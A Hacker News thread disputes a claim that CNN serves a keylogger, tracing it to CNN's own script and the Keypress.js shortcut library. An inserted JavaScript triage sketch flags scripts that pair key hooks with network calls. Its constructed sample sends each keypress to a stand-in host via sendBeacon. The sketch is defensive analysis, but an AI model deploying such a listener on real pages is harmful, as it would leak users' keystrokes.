Lots of speculation here, not much analysis, even from lazy gits like me.<p>Chrome web inspector kindly gives the "Initiator" for every request. In this case it's cnn-header-second.min.js. Load that, and Chrome again kindly detects minified JS and offers to pretty-print it.<p>The context here appears to be some kind of ad console tool, added by CNN, not by an ad. The relevant function is at <a href="https://pastebin.com/EwgPAM6T" rel="nofollow">https://pastebin.com/EwgPAM6T</a><p>It's a bit obfuscated/minified, and they don't seem to have a non-minified version available, so it's not clear exactly what functionality this is enabling.<p>Either way, not really a keylogger if it's not capturing all keystrokes and shipping them off somewhere.
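An added example (not part of the thread and not CNN's code): a static heuristic for the test the comment above applies, namely whether a script both hooks key events and contains a way to send data off the page. The function names and both sample snippets are constructed for illustration.

```javascript
// Added triage sketch (static heuristic, not proof): does a script both hook
// keyboard events and contain a way to send data off the page?
const KEY_HOOKS = [
  /addEventListener\(\s*["']key(?:down|up|press)["']/g,
  /\bonkey(?:down|up|press)\s*=/g,
];
const NETWORK_SINKS = [
  /\bfetch\s*\(/g,
  /\bXMLHttpRequest\b/g,
  /\bsendBeacon\s*\(/g,
  /\bnew\s+WebSocket\b/g,
  /\bnew\s+Image\b/g,
];
// Fixed shortcut strings such as "shift ctrl z" point to a key-binding
// library reacting to specific combos rather than recording every key.
const COMBO_STRING = /["'](?:(?:shift|ctrl|control|alt|meta|cmd)\s+)+\w+["']/gi;

function countMatches(source, patterns) {
  return patterns.reduce((n, re) => n + (source.match(re) || []).length, 0);
}

function triageKeyHandling(source) {
  const keyHooks = countMatches(source, KEY_HOOKS);
  const networkSinks = countMatches(source, NETWORK_SINKS);
  const comboBindings = (source.match(COMBO_STRING) || []).length;
  let verdict = "no-key-handling";
  if (keyHooks > 0 && networkSinks > 0) verdict = "review-data-flow";
  else if (keyHooks > 0) verdict = "local-key-handling";
  return { keyHooks, networkSinks, comboBindings, verdict };
}

// Constructed samples, not taken from cnn-header-second.min.js.
const SHORTCUT_SAMPLE = `
  document.addEventListener("keydown", track);
  listener.simple_combo("shift ctrl z", function () { panel.toggle(); });
`;
const EXFIL_SAMPLE = `
  document.addEventListener("keypress", function (e) {
    navigator.sendBeacon("https://collector.example/k", e.key);
  });
`;

console.log(triageKeyHandling(SHORTCUT_SAMPLE));
console.log(triageKeyHandling(EXFIL_SAMPLE));
```

A "review-data-flow" verdict only means the handler needs reading: a large site bundle will usually contain both key hooks and network calls without the two being connected.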
This is a prime example of how people so easily accept a headline shared on some news authority to be truth. Even the bright minds at Hacker News are duped - just look at all the discussion happening here with the assumption the headline is correct.<p>The guy who tweeted this jumped to a conclusion, naively shared his discovery, then let it perpetuate leaving numerous victims of an erroneously altered world-view.
The point stands, but that's not really a keylogger. It's a library to manage keyboard inputs. Of course, it could also send all key info somewhere externally too.
I'm skeptical that this is a) from a banner ad and not from operation of the site b) a full-blown keylogger and not a library included that is used for something like a photo gallery (that may have ads in it).
It appears to be getting the keypress.js library from ssl.cdn.turner.com. Not clear if the data is being exfiltrated, though, just by looking at that tweet.
>ssl.cdn.turner.com<p>Obviously bullshit. That's CNN's CDN, not a "banner ad". This guy did not put in the least bit of effort to verify his claims.<p>The script is included in <a href="https://edition.cnn.com/.a/2.103.4/js/cnn-header-second.min.js" rel="nofollow">https://edition.cnn.com/.a/2.103.4/js/cnn-header-second.min....</a>
Here's what is actually being run<p><a href="http://dmauro.github.io/Keypress/" rel="nofollow">http://dmauro.github.io/Keypress/</a>
I would suggest their "lite" [1] version. It is compatible with addons like NoScript, uMatrix, uBlock, Canvas Fingerprint Defender, CSS Exfil Protection, Privacy Settings and Self Destructing Cookies. I am using FF 52 ESR. Some of these addons may not work in 58+.<p>They could improve their HTTP header settings a bit. [2]<p>[1] - <a href="https://lite.cnn.io/" rel="nofollow">https://lite.cnn.io/</a><p>[2] - <a href="https://securityheaders.com/?q=https%3A%2F%2Fcnn.com%2F&followRedirects=on" rel="nofollow">https://securityheaders.com/?q=https%3A%2F%2Fcnn.com%2F&foll...</a>
Iframed banner ads <i>can’t</i> log keystrokes outside their frame, browsers don’t allow that. And no site in their right mind would include ads that aren’t iframed.<p>A keylogger would be possible if there was some kind of zero day exploit, but this isn’t that, it sounds like the tweeter didn’t do their due diligence. I’m curious how someone gets as far as looking through the minified JavaScript without knowing the browser doesn’t allow that, obviously(?), otherwise all your passwords and information would have been compromised long ago.
As someone who claims they are a programmer and researcher... you would think they would have done some more research on this and also have the common sense to know that this isn't a keylogger.
CNN, like the vast majority of news sites, is best viewed with JavaScript disabled. Pages load 10X faster, scrolling is not jumpy, the CPU doesn't go crazy, and text reads just as well. It is hands down a much improved user experience.
It's not CNN. It's ads.<p>Advertising has ruined every medium it has ever touched. It will ruin the web. It is only a matter of time. It did not destroy ancient network television overnight. It did not destroy cable tv overnight.<p>The last time I saw cable tv a few years back, it had become so bad that after a long run of ads, they would then put bugs and walk on people right over the content of the show you were watching. Sometimes obscuring important content within that show.
Press shift-control-z on cnn.com and you will get what this supposed keylogger is (hint - it's not a keylogger or coming from an ad) but merely a CNN internal tool.
Dearest Ad Industry,<p>This is why we run ad blockers. Since you won't regulate your industry, we're fixing the problem for you.<p>Love,<p>The Rest of the World.